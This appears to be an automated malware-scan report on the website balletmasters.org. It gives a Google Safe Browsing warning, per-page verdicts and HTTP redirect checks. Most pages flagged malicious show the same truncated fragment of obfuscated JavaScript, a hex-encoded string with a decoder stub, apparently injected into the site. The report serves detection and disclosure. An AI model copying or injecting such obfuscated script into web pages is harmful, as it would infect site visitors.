Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=balletmasters.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://balletmasters.org/ | 200 OK Content-Length: 17613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/templates/ja_xenia/scripts/ja.script.js | 200 OK Content-Length: 4219 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://balletmasters.org/index.php?option=com_frontpage&Itemid=1 | 200 OK Content-Length: 17699 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_content&task=blogcategory&id=15&Itemid=27 | 200 OK Content-Length: 13329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_content&task=section&id=1&Itemid=2 | 200 OK Content-Length: 14088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_content&task=blogcategory&id=14&Itemid=26 | 200 OK Content-Length: 13329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_flippingbook&Itemid=28 | 404 Not Found Content-Length: 13146 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_contact&Itemid=3 | 200 OK Content-Length: 17591 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php | 200 OK Content-Length: 17631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_rss&feed=RSS2.0&no_html=1 | 200 OK Content-Length: 12912 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/test404page.js | 404 Not Found Content-Length: 279 Content-Type: text/html | clean |
http://balletmasters.org/index2.php?option=com_contact&task=view&contact_id=1&Itemid=3&pop=1 | 200 OK Content-Length: 3829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write('<div align="center" style="margin-top: 30px; margin-bottom: 30px;">'); document.write('<a href="#" onclick="javascript:window.close();"><span class="small">Close Window</span></a>'); document.write('</div>'); Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_content&task=category§ionid=1&id=1&Itemid=2 | 200 OK Content-Length: 17098 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
| ||
http://balletmasters.org/index.php?option=com_content&task=view&id=6&Itemid=2 | 200 OK Content-Length: 18782 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tUC='';var pO = Math.ceil(45);var fHW;var nD = Math.random();var zE=64136;var uSE=new Array();var eEB=12392;fHW="c9d5c4dadac4c3d"+"495e2d6d0dcdb85"+"a0b3c6dcd8c9c7c"+"580838cd7929ed3"+"fdcdd8848eaee7c"+"ed2cbdbc2c6ddde"+"d0c6da92c4ffdfc"+"791959ec5cedbe5"+"f8e0c7cacfced59"+"a92d3dad3c3dbdf"+"9c9880d4e4dadec"+"0ca88adcc9cafd3"+"cbc8c6c2d29f8a8"+"991";var dS='';var cTZ=new Date();var eOGG='';var jUA='';function uW(o){var nO = Math.ceil(36);var yB='';var bI = Math.random();var oZ='';var t='';va Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: balletmasters.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 13:05:43 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 25 Dec 2014 13:05:43 GMT
Set-Cookie: 4e673ade01becc1300237f2ebfae3e24=-; path=/
Set-Cookie: JATheme=ja_xenia; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: ColorCSS=default; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: ScreenType=narrow; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: FontSize=3; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: balletmasters.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 13:05:43 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 25 Dec 2014 13:05:43 GMT
Set-Cookie: 4e673ade01becc1300237f2ebfae3e24=-; path=/
Set-Cookie: JATheme=ja_xenia; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: ColorCSS=default; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: ScreenType=narrow; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
Set-Cookie: FontSize=3; expires=Tue, 15-Dec-2015 13:05:43 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: balletmasters.org
Referer: http://www.google.com/search?q=balletmasters.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: balletmasters.org
Referer: http://www.google.com/search?q=balletmasters.org
Result:
The result is similar to the first query. There are no suspicious redirects found.